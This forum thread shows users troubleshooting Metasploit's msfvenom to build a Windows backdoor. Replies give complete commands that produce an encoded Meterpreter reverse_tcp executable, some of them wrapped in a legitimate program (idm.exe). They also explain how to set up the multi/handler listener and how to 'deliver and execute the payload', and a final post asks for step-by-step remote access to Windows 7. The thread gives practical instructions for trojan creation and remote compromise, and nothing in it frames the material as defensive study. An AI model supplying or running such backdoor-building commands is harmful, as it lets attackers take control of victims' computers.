Forum Thread: Problem with Metasploit Msfvenom reverse_tcp

i was following steps to creat backdoor with msfvenom
and i have to set the reversetcp payload or something like that!
anyway when i put
msfvenom -p windows/meterpreter/reverse
tcp
msf show me this text in the picture

Image via gulfup.com

can any one help me to fix it

13 Responses

Go back and read my tutorial on msfvenom. You are missing several switches.

i did exactly what u did in ur tuto "Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 5 (Msfvenom)"
when i put

msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.5 LPORT=443 -x /root/Desktop/idm.exe -e x86/shikataganai -i 200 -f exe >/root/VboxShare/backdoor.exe

msfvenom creat backdoor.exe file in vboxshare
but when i click on backdoor.exe in windows xp, the console stay like this :
* Started reverse handler on 192.168.1.5:443
* Starting the payload handler...
and nothing happend, so i think that the problem is in msfvenorm
because when i put msfvenom -p windows/meterpreter/reversetcp -o
it show me

Image via gulfup.com

and when i put msfvenom -p windows/meterpreter/reversetcp
it show me :

Image via wonderhowto.com

the problem maybe in my msf ?

Same problem. Though I get the payload out and the device is in the same network as I am, I cannot get past "Starting the payload handler" need help!

Its really quite simple. You are not typing in the complete command. You need to get all the command in.

in ur tuto u said:
-----------------------------
if we want to check the options for the windows/meterpreter/reversetcp payload, we simply type:

msf >msfvenom -p windows/meterpreter/reversetcp -0

When we do so, Metasploit responds like below.

Image via wonderhowto.com

--------------
but when i put
msfvenom -p windows/meterpreter/reversetcp -o
Metasploit responds like below for me

Image via wonderhowto.com

All your mistakes. You did not read his post thoroughly. However you did the first one right, but the number of encoding iterations is too high. Correct me if I'm wrong OTW, but the code could be too obfuscated so It can't decode and run. Try running the same command but with,say, 25 iterations like so:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -e x86/shikata_ga_nai -i 25 -f exe > /root/backdoor.exe

now just set up a handler and deliver and execute the payload. It should work.

thanks NEPI & occupytheweb
Payload size: 974 bytes (y) =D

may i ask u another question bro !
i just did it for the first time but it show me C:\WINDOWS>
and i want to run meterpreter> >
because i don't know how to deal with commands in cmd
can u tell me how can i run meterpreter !!

Image via gulfup.com

Looks like you used the wrong payload, since you already have a shell you might be able to transfer over a meterpreter infected exe and run it form the shell.

It seems that you used the shell payload instead of the meterpreter. Make sure that in msfvenom it's windows/meterpreter/reverse_tcp. Also in msfconsole after use multi/handler specify the same payload using set payload windows/meterpreter/reverse_tcp. Then it will automatically initiate a meterpreter shell after execution

thank you jermia & ne-py it's work after using windows/meterpreter/reversetcp ! =D

pay loader handler not loading please help full code step by step how to hack remotely acess windows 7

Share Your Thoughts

  • Hot
  • Active